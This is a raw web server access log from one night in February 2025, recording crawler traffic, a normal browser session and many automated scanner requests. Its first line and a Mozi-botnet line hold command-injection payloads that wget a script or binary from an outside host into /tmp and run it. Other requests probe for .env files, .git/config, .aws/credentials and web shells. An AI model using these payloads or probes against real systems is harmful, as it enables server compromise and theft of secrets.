37.139.5.66 - - [10/Feb/2025:01:01:27 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
156.59.198.136 - - [10/Feb/2025:01:15:34 +0100] "GET /ed.activities.at/stats/lang/awstats-et.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:01:19:33 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202002241503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.181.187.69 - - [10/Feb/2025:01:21:09 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [10/Feb/2025:01:23:34 +0100] "GET /renault.activities.at/htdocs/binaries/10015817.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:01:27:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104121503_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:01:31:34 +0100] "GET /docs/ecommlogistics/belege/STORNORE16-000008.PDF HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:01:50:36 +0100] "GET /renault.activities.at/htdocs/binaries/10661427.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
93.174.93.12 - - [10/Feb/2025:01:53:10 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
84.32.41.136 - - [10/Feb/2025:01:55:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 OPR/89.0.4447.51"
156.59.198.136 - - [10/Feb/2025:02:05:21 +0100] "GET /renault.activities.at/htdocs/binaries/10462869.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [10/Feb/2025:02:06:21 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.196.220.253 - - [10/Feb/2025:02:09:19 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
45.148.10.90 - - [10/Feb/2025:02:24:30 +0100] "\x16\x03\x01" 400 383 "-" "-"
45.148.10.90 - - [10/Feb/2025:02:24:30 +0100] "GET / HTTP/1.1" 400 383 "-" "-"
45.148.10.90 - - [10/Feb/2025:02:24:31 +0100] "GET / HTTP/1.1" 200 423 "-" "l9tcpid/v1.1.0"
45.148.10.90 - - [10/Feb/2025:02:24:36 +0100] "GET /.env.dev.local HTTP/1.1" 404 286 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:36 +0100] "GET /.env.secret HTTP/1.1" 404 284 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:37 +0100] "GET /config/.env HTTP/1.1" 404 285 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:37 +0100] "GET /backup/.git/config HTTP/1.1" 404 291 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:38 +0100] "GET /media/.git/config HTTP/1.1" 404 289 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:38 +0100] "GET /docker-compose.prod.yml HTTP/1.1" 404 294 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:38 +0100] "GET /.env.prod HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
45.148.10.90 - - [10/Feb/2025:02:24:38 +0100] "GET /prod/.env HTTP/1.1" 404 283 "-" "l9explore/1.2.2"
156.59.198.136 - - [10/Feb/2025:02:26:53 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909101203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:02:33:05 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image045.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [10/Feb/2025:02:45:12 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
156.59.198.136 - - [10/Feb/2025:02:49:06 +0100] "GET /renault.activities.at/htdocs/binaries/10009030.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:02:53:06 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202008251403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:02:57:08 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101250903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:03:01:08 +0100] "GET /docs/contadino/CIT/RE18-00013.pdf HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [10/Feb/2025:03:13:00 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.214.55.132 - - [10/Feb/2025:03:21:44 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [10/Feb/2025:03:22:12 +0100] "GET /renault.activities.at/htdocs/binaries/10004867.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
179.43.160.138 - - [10/Feb/2025:03:23:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.34 - - [10/Feb/2025:03:41:22 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
117.199.145.48 - - [10/Feb/2025:03:43:37 +0100] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 383 "-" "-"
51.159.111.112 - - [10/Feb/2025:03:46:49 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.111.112 - - [10/Feb/2025:03:46:55 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /layout.php HTTP/1.1" 200 816 "http://212.69.160.11/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 200 16206 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 910 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://212.69.160.11/layout.php" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /gui/javascript/jquery/css/gui-themes/jquery.tooltip.css HTTP/1.1" 200 246 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:56 +0100] "GET /gui/javascript/form_form.js?1739155616 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/javascript/jquery/js/jquery-1.8.2.js HTTP/1.1" 200 35391 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /framework/webfx/javascript/statusbar/statusBar.js HTTP/1.1" 200 649 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /framework/webfx/javascript/toolbar/ieemu.js HTTP/1.1" 200 2366 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /framework/webfx/javascript/toolbar/cb2.js HTTP/1.1" 200 1686 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/javascript/jquery/js/jquery-ui-1.9.0.custom.min.js HTTP/1.1" 200 51286 "http://212.69.160.11/entry.php?id=10270" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/images/icons/Logo_activites_RGB.gif HTTP/1.1" 200 1336 "http://212.69.160.11/entry.php?id=10273" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/images/emptybar.gif HTTP/1.1" 200 89 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://212.69.160.11/entry.php?id=10272" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /gui/javascript/form_form.js?1739155617 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10271&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2386 "http://212.69.160.11/entry.php?id=11412" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:57 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://212.69.160.11/entry.php?id=10287" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
51.159.111.112 - - [10/Feb/2025:03:46:58 +0100] "GET /gui/javascript/form_form.js?1739155618 HTTP/1.1" 200 16206 "http://212.69.160.11/entry.php?id=10270&" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.3"
156.59.198.135 - - [10/Feb/2025:03:51:27 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909051603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
159.203.179.10 - - [10/Feb/2025:03:58:14 +0100] "\x16\x03\x01" 400 383 "-" "-"
159.203.179.10 - - [10/Feb/2025:03:58:15 +0100] "\x16\x03\x01" 400 383 "-" "-"
159.203.179.10 - - [10/Feb/2025:03:58:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.179.10 - - [10/Feb/2025:03:58:15 +0100] "GET /form.html HTTP/1.1" 404 283 "-" "curl/8.1.2"
159.203.179.10 - - [10/Feb/2025:03:58:15 +0100] "GET /upl.php HTTP/1.1" 404 282 "-" "Mozilla/5.0"
159.203.179.10 - - [10/Feb/2025:03:58:16 +0100] "GET /t4 HTTP/1.1" 404 278 "-" "Mozilla/5.0"
159.203.179.10 - - [10/Feb/2025:03:58:16 +0100] "GET /geoip/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.179.10 - - [10/Feb/2025:03:58:16 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.179.10 - - [10/Feb/2025:03:58:16 +0100] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.179.10 - - [10/Feb/2025:03:58:17 +0100] "GET /systembc/password.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
159.203.179.10 - - [10/Feb/2025:03:58:17 +0100] "GET /password.php HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
156.59.198.136 - - [10/Feb/2025:03:59:01 +0100] "GET /renault.activities.at/htdocs/binaries/10044339.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [10/Feb/2025:04:24:49 +0100] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
35.203.211.227 - - [10/Feb/2025:04:36:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
156.59.198.136 - - [10/Feb/2025:04:46:34 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/toolbar%20quick%20mode.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:04:50:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202012091803_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.116 - - [10/Feb/2025:04:56:16 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "python-requests/2.26.0"
185.242.226.116 - - [10/Feb/2025:04:56:16 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.26.0"
156.59.198.135 - - [10/Feb/2025:04:56:23 +0100] "GET /hausegger.activities.at/stats/lang/awstats-al.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.68.89.10 - - [10/Feb/2025:04:59:26 +0100] "HEAD / HTTP/1.1" 200 - "-" "curl/7.68.0"
156.59.198.136 - - [10/Feb/2025:05:13:31 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202004271103_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:05:17:55 +0100] "GET /renault.activities.at/htdocs/binaries/10009029.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.196.220.253 - - [10/Feb/2025:05:23:54 +0100] "GET / HTTP/1.1" 200 423 "-" "Hello World"
172.169.5.17 - - [10/Feb/2025:05:43:12 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [10/Feb/2025:05:45:15 +0100] "GET /docs/ecommlogistics/belege/GS16-000001.PDF HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
4.151.229.13 - - [10/Feb/2025:05:50:49 +0100] "GET /actuator/health HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [10/Feb/2025:06:05:17 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image163.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:06:09:17 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202104221203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.233.73.109 - - [10/Feb/2025:06:11:56 +0100] "GET /.git/config HTTP/1.1" 404 293 "-" "FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)"
156.59.198.136 - - [10/Feb/2025:06:13:18 +0100] "GET /ed.activities.at/stats/lang/awstats-se.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
94.181.187.69 - - [10/Feb/2025:06:20:27 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.136 - - [10/Feb/2025:07:05:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909061703_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:07:19:37 +0100] "GET /renault.activities.at/htdocs/dompdf-master/www/test/images/png/resultga.gif HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:07:26:55 +0100] "GET /renault.activities.at/htdocs/binaries/10331571.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
71.6.232.25 - - [10/Feb/2025:07:28:50 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
156.59.198.135 - - [10/Feb/2025:07:30:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103261403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [10/Feb/2025:07:34:56 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909241403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
147.185.132.147 - - [10/Feb/2025:07:43:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
147.185.132.147 - - [10/Feb/2025:07:43:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
156.59.198.135 - - [10/Feb/2025:07:43:56 +0100] "GET /ed.activities.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
193.36.224.152 - - [10/Feb/2025:08:04:51 +0100] "GET /.aws/credentials HTTP/1.1" 404 287 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/15E148 Safari/604.1"
193.36.224.183 - - [10/Feb/2025:08:04:51 +0100] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
193.36.224.166 - - [10/Feb/2025:08:04:51 +0100] "GET /.aws/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
156.59.198.135 - - [10/Feb/2025:08:05:14 +0100] "GET /hausegger.activities.at/stats/lang/awstats-et.txt HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [10/Feb/2025:08:09:14 +0100] "GET /ed.activities.at/stats/lang/awstats-nl.txt HTTP/1.0" 404 304 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
